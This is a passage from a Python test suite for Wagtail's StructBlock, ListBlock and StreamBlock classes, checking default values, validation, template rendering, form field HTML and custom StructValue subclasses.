surname = blocks.CharBlock()
class EventBlock(blocks.StructBlock):
title = blocks.CharBlock()
guest_speaker = PersonBlock(default={'first_name': 'Ed', 'surname': 'Balls'})
event_block = EventBlock()
event1 = event_block.to_python({'title': 'Birthday party'}) # guest_speaker will default to Ed Balls
event2 = event_block.to_python({'title': 'Christmas party'}) # guest_speaker will default to Ed Balls, but a distinct instance
event1['guest_speaker']['surname'] = 'Miliband'
self.assertEqual(event1['guest_speaker']['surname'], 'Miliband')
# event2 should not be modified
self.assertEqual(event2['guest_speaker']['surname'], 'Balls')
def test_bulk_to_python_returns_distinct_default_instances(self):
"""
Whenever StructBlock.bulk_to_python invokes a child block's get_default method to
fill in missing fields, it should use a separate invocation for each record so that
we don't end up with the same instance of a mutable value on multiple records
"""
class ShoppingListBlock(blocks.StructBlock):
shop = blocks.CharBlock()
items = blocks.ListBlock(blocks.CharBlock(default='chocolate'))
block = ShoppingListBlock()
shopping_lists = block.bulk_to_python([
{'shop': 'Tesco'}, # 'items' defaults to ['chocolate']
{'shop': 'Asda'}, # 'items' defaults to ['chocolate'], but a distinct instance
])
shopping_lists[0]['items'].append('cake')
self.assertEqual(shopping_lists[0]['items'], ['chocolate', 'cake'])
# shopping_lists[1] should not be updated
self.assertEqual(shopping_lists[1]['items'], ['chocolate'])
def test_clean(self):
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
])
value = block.to_python({'title': 'Torchbox', 'link': 'http://www.torchbox.com/'})
clean_value = block.clean(value)
self.assertTrue(isinstance(clean_value, blocks.StructValue))
self.assertEqual(clean_value['title'], 'Torchbox')
value = block.to_python({'title': 'Torchbox', 'link': 'not a url'})
with self.assertRaises(ValidationError):
block.clean(value)
def test_bound_blocks_are_available_on_template(self):
"""
Test that we are able to use value.bound_blocks within templates
to access a child block's own HTML rendering
"""
block = SectionBlock()
value = block.to_python({'title': 'Hello', 'body': '<i>italic</i> world'})
result = block.render(value)
self.assertEqual(result, """<h1>Hello</h1><i>italic</i> world""")
def test_render_block_with_extra_context(self):
block = SectionBlock()
value = block.to_python({'title': 'Bonjour', 'body': 'monde <i>italique</i>'})
result = block.render(value, context={'language': 'fr'})
self.assertEqual(result, """<h1 lang="fr">Bonjour</h1>monde <i>italique</i>""")
def test_render_structvalue(self):
"""
The HTML representation of a StructValue should use the block's template
"""
block = SectionBlock()
value = block.to_python({'title': 'Hello', 'body': '<i>italic</i> world'})
result = value.__html__()
self.assertEqual(result, """<h1>Hello</h1><i>italic</i> world""")
# value.render_as_block() should be equivalent to value.__html__()
result = value.render_as_block()
self.assertEqual(result, """<h1>Hello</h1><i>italic</i> world""")
def test_str_structvalue(self):
"""
The str() representation of a StructValue should NOT render the template, as that's liable
to cause an infinite loop if any debugging / logging code attempts to log the fact that
it rendered a template with this object in the context:
https://github.com/wagtail/wagtail/issues/2874
https://github.com/jazzband/django-debug-toolbar/issues/950
"""
block = SectionBlock()
value = block.to_python({'title': 'Hello', 'body': '<i>italic</i> world'})
result = str(value)
self.assertNotIn('<h1>', result)
# The expected rendering should correspond to the native representation of an OrderedDict:
# "StructValue([('title', u'Hello'), ('body', <wagtail.core.rich_text.RichText object at 0xb12d5eed>)])"
# - give or take some quoting differences between Python versions
self.assertIn('StructValue', result)
self.assertIn('title', result)
self.assertIn('Hello', result)
def test_render_structvalue_with_extra_context(self):
block = SectionBlock()
value = block.to_python({'title': 'Bonjour', 'body': 'monde <i>italique</i>'})
result = value.render_as_block(context={'language': 'fr'})
self.assertEqual(result, """<h1 lang="fr">Bonjour</h1>monde <i>italique</i>""")
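# Recap of the StructValue rendering surface exercised above (illustrative):
#
#     value.__html__()          # renders with the block's template
#     value.render_as_block()   # same as __html__(), optionally with extra context
#     str(value)                # plain "StructValue([...])" repr; deliberately does NOT
#                               # render the template, to avoid recursion from logging code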
class TestStructBlockWithCustomStructValue(SimpleTestCase):
def test_initialisation(self):
class CustomStructValue(blocks.StructValue):
def joined(self):
return self.get('title', '') + self.get('link', '')
block = blocks.StructBlock([
('title', blocks.CharBlock()),
('link', blocks.URLBlock()),
], value_class=CustomStructValue)
self.assertEqual(list(block.child_blocks.keys()), ['title', 'link'])
block_value = block.to_python({'title': 'Birthday party', 'link': 'https://myparty.co.uk'})
self.assertIsInstance(block_value, CustomStructValue)
default_value = block.get_default()
self.assertIsInstance(default_value, CustomStructValue)
value_from_datadict = block.value_from_datadict({
'mylink-title': "Torchbox",
'mylink-link': "http://www.torchbox.com"
}, {}, 'mylink')
self.assertIsInstance(value_from_datadict, CustomStructValue)
value = block.to_python({'title': 'Torchbox', 'link': 'http://www.torchbox.com/'})
clean_value = block.clean(value)
self.assertTrue(isinstance(clean_value, CustomStructValue))
self.assertEqual(clean_value['title'], 'Torchbox')
value = block.to_python({'title': 'Torchbox', 'link': 'not a url'})
with self.assertRaises(ValidationError):
block.clean(value)
def test_initialisation_from_subclass(self):
class LinkStructValue(blocks.StructValue):
def url(self):
return self.get('page') or self.get('link')
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
page = blocks.PageChooserBlock(required=False)
link = blocks.URLBlock(required=False)
class Meta:
value_class = LinkStructValue
block = LinkBlock()
self.assertEqual(list(block.child_blocks.keys()), ['title', 'page', 'link'])
block_value = block.to_python({'title': 'Website', 'link': 'https://website.com'})
self.assertIsInstance(block_value, LinkStructValue)
default_value = block.get_default()
self.assertIsInstance(default_value, LinkStructValue)
def test_initialisation_with_multiple_subclasses(self):
class LinkStructValue(blocks.StructValue):
def url(self):
return self.get('page') or self.get('link')
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
page = blocks.PageChooserBlock(required=False)
link = blocks.URLBlock(required=False)
class Meta:
value_class = LinkStructValue
class StyledLinkBlock(LinkBlock):
classname = blocks.CharBlock()
block = StyledLinkBlock()
self.assertEqual(list(block.child_blocks.keys()), ['title', 'page', 'link', 'classname'])
value_from_datadict = block.value_from_datadict({
'queen-title': "Torchbox",
'queen-link': "http://www.torchbox.com",
'queen-classname': "fullsize",
}, {}, 'queen')
self.assertIsInstance(value_from_datadict, LinkStructValue)
def test_initialisation_with_mixins(self):
class LinkStructValue(blocks.StructValue):
pass
class StylingMixinStructValue(blocks.StructValue):
pass
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class Meta:
value_class = LinkStructValue
class StylingMixin(blocks.StructBlock):
classname = blocks.CharBlock()
class StyledLinkBlock(StylingMixin, LinkBlock):
source = blocks.CharBlock()
block = StyledLinkBlock()
self.assertEqual(list(block.child_blocks.keys()),
['title', 'link', 'classname', 'source'])
block_value = block.to_python({
'title': 'Website', 'link': 'https://website.com',
'source': 'google', 'classname': 'full-size',
})
self.assertIsInstance(block_value, LinkStructValue)
def test_value_property(self):
class SectionStructValue(blocks.StructValue):
@property
def foo(self):
return 'bar %s' % self.get('title', '')
class SectionBlock(blocks.StructBlock):
title = blocks.CharBlock()
body = blocks.RichTextBlock()
class Meta:
value_class = SectionStructValue
block = SectionBlock()
struct_value = block.to_python({'title': 'hello', 'body': '<b>world</b>'})
value = struct_value.foo
self.assertEqual(value, 'bar hello')
def test_render_with_template(self):
class SectionStructValue(blocks.StructValue):
def title_with_suffix(self):
title = self.get('title')
if title:
return 'SUFFIX %s' % title
return 'EMPTY TITLE'
class SectionBlock(blocks.StructBlock):
title = blocks.CharBlock(required=False)
class Meta:
value_class = SectionStructValue
block = SectionBlock(template='tests/blocks/struct_block_custom_value.html')
struct_value = block.to_python({'title': 'hello'})
html = block.render(struct_value)
self.assertEqual(html, '<div>SUFFIX hello</div>\n')
struct_value = block.to_python({})
html = block.render(struct_value)
self.assertEqual(html, '<div>EMPTY TITLE</div>\n')
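# Minimal sketch (mirroring the tests above) of attaching a custom StructValue so that
# templates or Python code can call value.url():
#
#     class LinkStructValue(blocks.StructValue):
#         def url(self):
#             return self.get('page') or self.get('link')
#
#     class LinkBlock(blocks.StructBlock):
#         title = blocks.CharBlock()
#         page = blocks.PageChooserBlock(required=False)
#         link = blocks.URLBlock(required=False)
#
#         class Meta:
#             value_class = LinkStructValue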
class TestListBlock(WagtailTestUtils, SimpleTestCase):
def test_initialise_with_class(self):
block = blocks.ListBlock(blocks.CharBlock)
# Child block should be initialised for us
self.assertIsInstance(block.child_block, blocks.CharBlock)
def test_initialise_with_instance(self):
child_block = blocks.CharBlock()
block = blocks.ListBlock(child_block)
self.assertEqual(block.child_block, child_block)
def render(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock())
return block.render([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
])
def test_render_uses_ul(self):
html = self.render()
self.assertIn('<ul>', html)
self.assertIn('</ul>', html)
def test_render_uses_li(self):
html = self.render()
self.assertIn('<li>', html)
self.assertIn('</li>', html)
def test_render_calls_block_render_on_children(self):
"""
The default rendering of a ListBlock should invoke the block's render method
on each child, rather than just outputting the child value as a string.
"""
block = blocks.ListBlock(
blocks.CharBlock(template='tests/blocks/heading_block.html')
)
html = block.render(["Hello world!", "Goodbye world!"])
self.assertIn('<h1>Hello world!</h1>', html)
self.assertIn('<h1>Goodbye world!</h1>', html)
def test_render_passes_context_to_children(self):
"""
Template context passed to the render method should be passed on
to the render method of the child block.
"""
block = blocks.ListBlock(
blocks.CharBlock(template='tests/blocks/heading_block.html')
)
html = block.render(["Bonjour le monde!", "Au revoir le monde!"], context={
'language': 'fr',
})
self.assertIn('<h1 lang="fr">Bonjour le monde!</h1>', html)
self.assertIn('<h1 lang="fr">Au revoir le monde!</h1>', html)
def test_get_api_representation_calls_same_method_on_children_with_context(self):
"""
The get_api_representation method of a ListBlock should invoke
the block's get_api_representation method on each child and
the context should be passed on.
"""
class ContextBlock(blocks.CharBlock):
def get_api_representation(self, value, context=None):
return context[value]
block = blocks.ListBlock(
ContextBlock()
)
api_representation = block.get_api_representation(["en", "fr"], context={
'en': 'Hello world!',
'fr': 'Bonjour le monde!'
})
self.assertEqual(
api_representation, ['Hello world!', 'Bonjour le monde!']
)
def render_form(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock)
html = block.render_form([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
], prefix='links')
return html
def test_render_form_wrapper_class(self):
html = self.render_form()
self.assertIn('<div class="c-sf-container">', html)
def test_render_form_count_field(self):
html = self.render_form()
self.assertIn('<input type="hidden" name="links-count" id="links-count" value="2">', html)
def test_render_form_delete_field(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="links-0-deleted" name="links-0-deleted" value="">', html)
def test_render_form_order_fields(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="links-0-order" name="links-0-order" value="0">', html)
self.assertIn('<input type="hidden" id="links-1-order" name="links-1-order" value="1">', html)
def test_render_form_labels(self):
html = self.render_form()
self.assertIn('<label class="field__label" for="links-0-value-title">Title</label>', html)
self.assertIn('<label class="field__label" for="links-0-value-link">Link</label>', html)
def test_render_form_values(self):
html = self.render_form()
self.assertInHTML(
(
'<input id="links-0-value-title" name="links-0-value-title" placeholder="Title"'
' type="text" value="Wagtail" />'
),
html
)
self.assertInHTML(
(
'<input id="links-0-value-link" name="links-0-value-link" placeholder="Link" type="url"'
' value="http://www.wagtail.io" />'
),
html
)
self.assertInHTML(
(
'<input id="links-1-value-title" name="links-1-value-title" placeholder="Title" type="text"'
' value="Django" />'
),
html
)
self.assertInHTML(
(
'<input id="links-1-value-link" name="links-1-value-link" placeholder="Link"'
' type="url" value="http://www.djangoproject.com" />'
),
html
)
def test_html_declarations(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock)
html = block.html_declarations()
self.assertTagInTemplateScript(
'<input id="__PREFIX__-value-title" name="__PREFIX__-value-title" placeholder="Title" type="text" />',
html
)
self.assertTagInTemplateScript(
'<input id="__PREFIX__-value-link" name="__PREFIX__-value-link" placeholder="Link" type="url" />',
html
)
def test_html_declarations_uses_default(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock(default="Github")
link = blocks.URLBlock(default="http://www.github.com")
block = blocks.ListBlock(LinkBlock)
html = block.html_declarations()
self.assertTagInTemplateScript(
(
'<input id="__PREFIX__-value-title" name="__PREFIX__-value-title" placeholder="Title"'
' type="text" value="Github" />'
),
html
)
self.assertTagInTemplateScript(
(
'<input id="__PREFIX__-value-link" name="__PREFIX__-value-link" placeholder="Link"'
' type="url" value="http://www.github.com" />'
),
html
)
def test_media_inheritance(self):
class ScriptedCharBlock(blocks.CharBlock):
media = forms.Media(js=['scripted_char_block.js'])
block = blocks.ListBlock(ScriptedCharBlock())
self.assertIn('scripted_char_block.js', ''.join(block.all_media().render_js()))
def test_html_declaration_inheritance(self):
class CharBlockWithDeclarations(blocks.CharBlock):
def html_declarations(self):
return '<script type="text/x-html-template">hello world</script>'
block = blocks.ListBlock(CharBlockWithDeclarations())
self.assertIn('<script type="text/x-html-template">hello world</script>', block.all_html_declarations())
def test_searchable_content(self):
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock())
content = block.get_searchable_content([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
])
self.assertEqual(content, ["Wagtail", "Django"])
def test_value_omitted_from_data(self):
block = blocks.ListBlock(blocks.CharBlock())
# overall value is considered present in the form if the 'count' field is present
self.assertFalse(block.value_omitted_from_data({'mylist-count': '0'}, {}, 'mylist'))
self.assertFalse(block.value_omitted_from_data({
'mylist-count': '1',
'mylist-0-value': 'hello', 'mylist-0-deleted': '', 'mylist-0-order': '0'
}, {}, 'mylist'))
self.assertTrue(block.value_omitted_from_data({'nothing-here': 'nope'}, {}, 'mylist'))
def test_ordering_in_form_submission_uses_order_field(self):
block = blocks.ListBlock(blocks.CharBlock())
# check that items are ordered by the 'order' field, not the order they appear in the form
post_data = {'shoppinglist-count': '3'}
for i in range(0, 3):
post_data.update({
'shoppinglist-%d-deleted' % i: '',
'shoppinglist-%d-order' % i: str(2 - i),
'shoppinglist-%d-value' % i: "item %d" % i
})
block_value = block.value_from_datadict(post_data, {}, 'shoppinglist')
self.assertEqual(block_value[2], "item 0")
def test_ordering_in_form_submission_is_numeric(self):
block = blocks.ListBlock(blocks.CharBlock())
# check that items are ordered by 'order' numerically, not alphabetically
post_data = {'shoppinglist-count': '12'}
for i in range(0, 12):
post_data.update({
'shoppinglist-%d-deleted' % i: '',
'shoppinglist-%d-order' % i: str(i),
'shoppinglist-%d-value' % i: "item %d" % i
})
block_value = block.value_from_datadict(post_data, {}, 'shoppinglist')
self.assertEqual(block_value[2], "item 2")
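# Sketch of the posted field layout a ListBlock reads back (names as used in these tests):
#
#     shoppinglist-count      number of item forms in the submission
#     shoppinglist-N-order    numeric sort key; items are reordered by this value
#     shoppinglist-N-deleted  left blank here for items that should be kept
#     shoppinglist-N-value    the child block's own submitted value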
def test_can_specify_default(self):
class ShoppingListBlock(blocks.StructBlock):
shop = blocks.CharBlock()
items = blocks.ListBlock(blocks.CharBlock(), default=['peas', 'beans', 'carrots'])
block = ShoppingListBlock()
# the value here does not specify an 'items' field, so this should revert to the ListBlock's default
form_html = block.render_form(block.to_python({'shop': 'Tesco'}), prefix='shoppinglist')
self.assertIn(
'<input type="hidden" name="shoppinglist-items-count" id="shoppinglist-items-count" value="3">',
form_html
)
self.assertIn('value="peas"', form_html)
def test_default_default(self):
"""
if no explicit 'default' is set on the ListBlock, it should fall back on
a single instance of the child block in its default state.
"""
class ShoppingListBlock(blocks.StructBlock):
shop = blocks.CharBlock()
items = blocks.ListBlock(blocks.CharBlock(default='chocolate'))
block = ShoppingListBlock()
# the value here does not specify an 'items' field, so this should revert to the ListBlock's default
form_html = block.render_form(block.to_python({'shop': 'Tesco'}), prefix='shoppinglist')
self.assertIn(
'<input type="hidden" name="shoppinglist-items-count" id="shoppinglist-items-count" value="1">',
form_html
)
self.assertIn('value="chocolate"', form_html)
def test_default_value_is_distinct_instance(self):
"""
Whenever the default value of a ListBlock is invoked, it should be a distinct
instance of the list so that modifying it doesn't modify other places where the
default value appears.
"""
class ShoppingListBlock(blocks.StructBlock):
shop = blocks.CharBlock()
items = blocks.ListBlock(blocks.CharBlock(default='chocolate'))
block = ShoppingListBlock()
tesco_shopping = block.to_python({'shop': 'Tesco'}) # 'items' will default to ['chocolate']
asda_shopping = block.to_python({'shop': 'Asda'}) # 'items' will default to ['chocolate'], but a distinct instance
tesco_shopping['items'].append('cake')
self.assertEqual(tesco_shopping['items'], ['chocolate', 'cake'])
# asda_shopping should not be modified
self.assertEqual(asda_shopping['items'], ['chocolate'])
def test_render_with_classname_via_kwarg(self):
"""form_classname from kwargs to be used as an additional class when rendering list block"""
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
block = blocks.ListBlock(LinkBlock, form_classname='special-list-class')
html = block.render_form([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
], prefix='links')
# including leading space to ensure class name gets added correctly
self.assertEqual(html.count(' special-list-class'), 1)
def test_render_with_classname_via_class_meta(self):
"""form_classname from meta to be used as an additional class when rendering list block"""
class LinkBlock(blocks.StructBlock):
title = blocks.CharBlock()
link = blocks.URLBlock()
class CustomListBlock(blocks.ListBlock):
class Meta:
form_classname = 'custom-list-class'
block = CustomListBlock(LinkBlock)
html = block.render_form([
{
'title': "Wagtail",
'link': 'http://www.wagtail.io',
},
{
'title': "Django",
'link': 'http://www.djangoproject.com',
},
], prefix='links')
# including leading space to ensure class name gets added correctly
self.assertEqual(html.count(' custom-list-class'), 1)
class TestListBlockWithFixtures(TestCase):
fixtures = ['test.json']
def test_calls_child_bulk_to_python_when_available(self):
page_ids = [2, 3, 4, 5]
expected_pages = Page.objects.filter(pk__in=page_ids)
block = blocks.ListBlock(blocks.PageChooserBlock())
with self.assertNumQueries(1):
pages = block.to_python(page_ids)
self.assertSequenceEqual(pages, expected_pages)
def test_bulk_to_python(self):
block = blocks.ListBlock(blocks.PageChooserBlock())
with self.assertNumQueries(1):
result = block.bulk_to_python([[4, 5], [], [2]])
self.assertEqual(result, [
[Page.objects.get(id=4), Page.objects.get(id=5)],
[],
[Page.objects.get(id=2)],
])
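# Illustrative note: bulk_to_python lets a database-backed child block such as
# PageChooserBlock resolve every referenced page in a single query rather than one query
# per value, which is what the assertNumQueries(1) checks above verify.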
class TestStreamBlock(WagtailTestUtils, SimpleTestCase):
def test_initialisation(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
('paragraph', blocks.CharBlock()),
])
self.assertEqual(list(block.child_blocks.keys()), ['heading', 'paragraph'])
def test_initialisation_with_binary_string_names(self):
# migrations will sometimes write out names as binary strings, just to keep us on our toes
block = blocks.StreamBlock([
(b'heading', blocks.CharBlock()),
(b'paragraph', blocks.CharBlock()),
])
self.assertEqual(list(block.child_blocks.keys()), [b'heading', b'paragraph'])
def test_initialisation_from_subclass(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
self.assertEqual(list(block.child_blocks.keys()), ['heading', 'paragraph'])
def test_initialisation_from_subclass_with_extra(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock([
('intro', blocks.CharBlock())
])
self.assertEqual(list(block.child_blocks.keys()), ['heading', 'paragraph', 'intro'])
def test_initialisation_with_multiple_subclasses(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
class ArticleWithIntroBlock(ArticleBlock):
intro = blocks.CharBlock()
block = ArticleWithIntroBlock()
self.assertEqual(list(block.child_blocks.keys()), ['heading', 'paragraph', 'intro'])
def test_initialisation_with_mixins(self):
"""
The order of child blocks of a ``StreamBlock`` with multiple parent
classes is slightly surprising at first. Child blocks are inherited in
a bottom-up order, by traversing the MRO in reverse. In the example
below, ``ArticleWithIntroBlock`` will have an MRO of::
[ArticleWithIntroBlock, IntroMixin, ArticleBlock, StreamBlock, ...]
This will result in ``intro`` appearing *after* ``heading`` and
``paragraph`` in ``ArticleWithIntroBlock.child_blocks``, even though
``IntroMixin`` appeared before ``ArticleBlock``.
"""
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
class IntroMixin(blocks.StreamBlock):
intro = blocks.CharBlock()
class ArticleWithIntroBlock(IntroMixin, ArticleBlock):
by_line = blocks.CharBlock()
block = ArticleWithIntroBlock()
self.assertEqual(list(block.child_blocks.keys()),
['heading', 'paragraph', 'intro', 'by_line'])
def test_field_has_changed(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())])
initial_value = blocks.StreamValue(block, [('paragraph', 'test')])
initial_value[0].id = 'a'
data_value = blocks.StreamValue(block, [('paragraph', 'test')])
data_value[0].id = 'a'
# identical ids and content, so has_changed should return False
self.assertFalse(blocks.BlockField(block).has_changed(initial_value, data_value))
changed_data_value = blocks.StreamValue(block, [('paragraph', 'not a test')])
changed_data_value[0].id = 'a'
# identical ids but changed content, so has_changed should return True
self.assertTrue(blocks.BlockField(block).has_changed(initial_value, changed_data_value))
def test_required_raises_an_exception_if_empty(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())], required=True)
value = blocks.StreamValue(block, [])
with self.assertRaises(blocks.StreamBlockValidationError):
block.clean(value)
def test_required_does_not_raise_an_exception_if_not_empty(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())], required=True)
value = block.to_python([{'type': 'paragraph', 'value': 'Hello'}])
try:
block.clean(value)
except blocks.StreamBlockValidationError:
raise self.failureException("%s was raised" % blocks.StreamBlockValidationError)
def test_not_required_does_not_raise_an_exception_if_empty(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())], required=False)
value = blocks.StreamValue(block, [])
try:
block.clean(value)
except blocks.StreamBlockValidationError:
raise self.failureException("%s was raised" % blocks.StreamBlockValidationError)
def test_required_by_default(self):
block = blocks.StreamBlock([('paragraph', blocks.CharBlock())])
value = blocks.StreamValue(block, [])
with self.assertRaises(blocks.StreamBlockValidationError):
block.clean(value)
def render_article(self, data):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.RichTextBlock()
block = ArticleBlock()
value = block.to_python(data)
return block.render(value)
def test_get_api_representation_calls_same_method_on_children_with_context(self):
"""
The get_api_representation method of a StreamBlock should invoke
the block's get_api_representation method on each child and
the context should be passed on.
"""
class ContextBlock(blocks.CharBlock):
def get_api_representation(self, value, context=None):
return context[value]
block = blocks.StreamBlock([
('language', ContextBlock()),
('author', ContextBlock()),
])
api_representation = block.get_api_representation(
block.to_python([
{'type': 'language', 'value': 'en'},
{'type': 'author', 'value': 'wagtail', 'id': '111111'},
]),
context={
'en': 'English',
'wagtail': 'Wagtail!'
}
)
self.assertListEqual(
api_representation, [
{'type': 'language', 'value': 'English', 'id': None},
{'type': 'author', 'value': 'Wagtail!', 'id': '111111'},
]
)
def test_render(self):
html = self.render_article([
{
'type': 'heading',
'value': "My title",
},
{
'type': 'paragraph',
'value': 'My <i>first</i> paragraph',
},
{
'type': 'paragraph',
'value': 'My second paragraph',
},
])
self.assertIn('<div class="block-heading">My title</div>', html)
self.assertIn('<div class="block-paragraph">My <i>first</i> paragraph</div>', html)
self.assertIn('<div class="block-paragraph">My second paragraph</div>', html)
def test_render_unknown_type(self):
# This can happen if a developer removes a type from their StreamBlock
html = self.render_article([
{
'type': 'foo',
'value': "Hello",
},
{
'type': 'paragraph',
'value': 'My first paragraph',
},
])
self.assertNotIn('foo', html)
self.assertNotIn('Hello', html)
self.assertIn('<div class="block-paragraph">My first paragraph</div>', html)
def test_render_calls_block_render_on_children(self):
"""
The default rendering of a StreamBlock should invoke the block's render method
on each child, rather than just outputting the child value as a string.
"""
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
])
value = block.to_python([
{'type': 'heading', 'value': 'Hello'}
])
html = block.render(value)
self.assertIn('<div class="block-heading"><h1>Hello</h1></div>', html)
# calling render_as_block() on value (a StreamValue instance)
# should be equivalent to block.render(value)
html = value.render_as_block()
self.assertIn('<div class="block-heading"><h1>Hello</h1></div>', html)
def test_render_passes_context_to_children(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
])
value = block.to_python([
{'type': 'heading', 'value': 'Bonjour'}
])
html = block.render(value, context={
'language': 'fr',
})
self.assertIn('<div class="block-heading"><h1 lang="fr">Bonjour</h1></div>', html)
# calling render_as_block(context=foo) on value (a StreamValue instance)
# should be equivalent to block.render(value, context=foo)
html = value.render_as_block(context={
'language': 'fr',
})
self.assertIn('<div class="block-heading"><h1 lang="fr">Bonjour</h1></div>', html)
def test_render_on_stream_child_uses_child_template(self):
"""
Accessing a child element of the stream (giving a StreamChild object) and rendering it
should use the block template, not just render the value's string representation
"""
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
])
value = block.to_python([
{'type': 'heading', 'value': 'Hello'}
])
html = value[0].render()
self.assertEqual('<h1>Hello</h1>', html)
# StreamChild.__str__ should do the same
html = str(value[0])
self.assertEqual('<h1>Hello</h1>', html)
# and so should StreamChild.render_as_block
html = value[0].render_as_block()
self.assertEqual('<h1>Hello</h1>', html)
def test_can_pass_context_to_stream_child_template(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock(template='tests/blocks/heading_block.html')),
('paragraph', blocks.CharBlock()),
])
value = block.to_python([
{'type': 'heading', 'value': 'Bonjour'}
])
html = value[0].render(context={'language': 'fr'})
self.assertEqual('<h1 lang="fr">Bonjour</h1>', html)
# the same functionality should be available through the alias `render_as_block`
html = value[0].render_as_block(context={'language': 'fr'})
self.assertEqual('<h1 lang="fr">Bonjour</h1>', html)
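# Illustrative note: for a StreamValue child, child.render(), str(child) and
# child.render_as_block() all go through the child block's template, unlike StructValue
# where str() deliberately bypasses template rendering (see TestStructBlock above).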
def render_form(self):
class ArticleBlock(blocks.StreamBlock):
heading = blocks.CharBlock()
paragraph = blocks.CharBlock()
block = ArticleBlock()
value = block.to_python([
{
'type': 'heading',
'value': "My title",
'id': '123123123',
},
{
'type': 'paragraph',
'value': 'My first paragraph',
},
{
'type': 'paragraph',
'value': 'My second paragraph',
},
])
return block.render_form(value, prefix='myarticle')
def test_render_form_wrapper_class(self):
html = self.render_form()
self.assertIn('<div class="c-sf-container">', html)
def test_render_form_count_field(self):
html = self.render_form()
self.assertIn('<input type="hidden" name="myarticle-count" id="myarticle-count" value="3">', html)
def test_render_form_delete_field(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="myarticle-0-deleted" name="myarticle-0-deleted" value="">', html)
def test_render_form_order_fields(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="myarticle-0-order" name="myarticle-0-order" value="0">', html)
self.assertIn('<input type="hidden" id="myarticle-1-order" name="myarticle-1-order" value="1">', html)
self.assertIn('<input type="hidden" id="myarticle-2-order" name="myarticle-2-order" value="2">', html)
def test_render_form_id_fields(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="myarticle-0-id" name="myarticle-0-id" value="123123123">', html)
self.assertIn('<input type="hidden" id="myarticle-1-id" name="myarticle-1-id" value="">', html)
self.assertIn('<input type="hidden" id="myarticle-2-id" name="myarticle-2-id" value="">', html)
def test_render_form_type_fields(self):
html = self.render_form()
self.assertIn('<input type="hidden" id="myarticle-0-type" name="myarticle-0-type" value="heading">', html)
self.assertIn('<input type="hidden" id="myarticle-1-type" name="myarticle-1-type" value="paragraph">', html)
self.assertIn('<input type="hidden" id="myarticle-2-type" name="myarticle-2-type" value="paragraph">', html)
def test_render_form_value_fields(self):
html = self.render_form()
self.assertInHTML(
(
'<input id="myarticle-0-value" name="myarticle-0-value" placeholder="Heading"'
' type="text" value="My title" />'
),
html
)
self.assertInHTML(
(
'<input id="myarticle-1-value" name="myarticle-1-value" placeholder="Paragraph"'
' type="text" value="My first paragraph" />'
),
html
)
self.assertInHTML(
(
'<input id="myarticle-2-value" name="myarticle-2-value" placeholder="Paragraph"'
' type="text" value="My second paragraph" />'
),
html
)
def test_value_omitted_from_data(self):
block = blocks.StreamBlock([
('heading', blocks.CharBlock()),
])
# overall value is considered present in the form if the 'count' field is present
self.assertFalse(block.value_omitted_from_data({'mystream-count': '0'}, {}, 'mystream'))
self.assertFalse(block.value_omitted_from_data({
'mystream-count': '1',
'mystream-0-type': 'heading', 'mystream-0-value': 'hello',
'mystream-0-deleted': '', 'mystream-0-order': '0'
}, {}, 'mystream'))
self.assertTrue(block.value_omitted_from_data({'nothing-here': 'nope'}, {}, 'mystream'))
def test_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
block = ValidatedBlock()
value = blocks.StreamValue(block, [
('char', ''),
('char', 'foo'),
('url', 'http://example.com/'),
('url', 'not a url'),
])
with self.assertRaises(ValidationError) as catcher:
block.clean(value)
self.assertEqual(catcher.exception.params, {
0: ['This field is required.'],
3: ['Enter a valid URL.'],
})
def test_min_num_validation_errors(self):
class ValidatedBlock(blocks.StreamBlock):
char = blocks.CharBlock()
url = blocks.URLBlock()
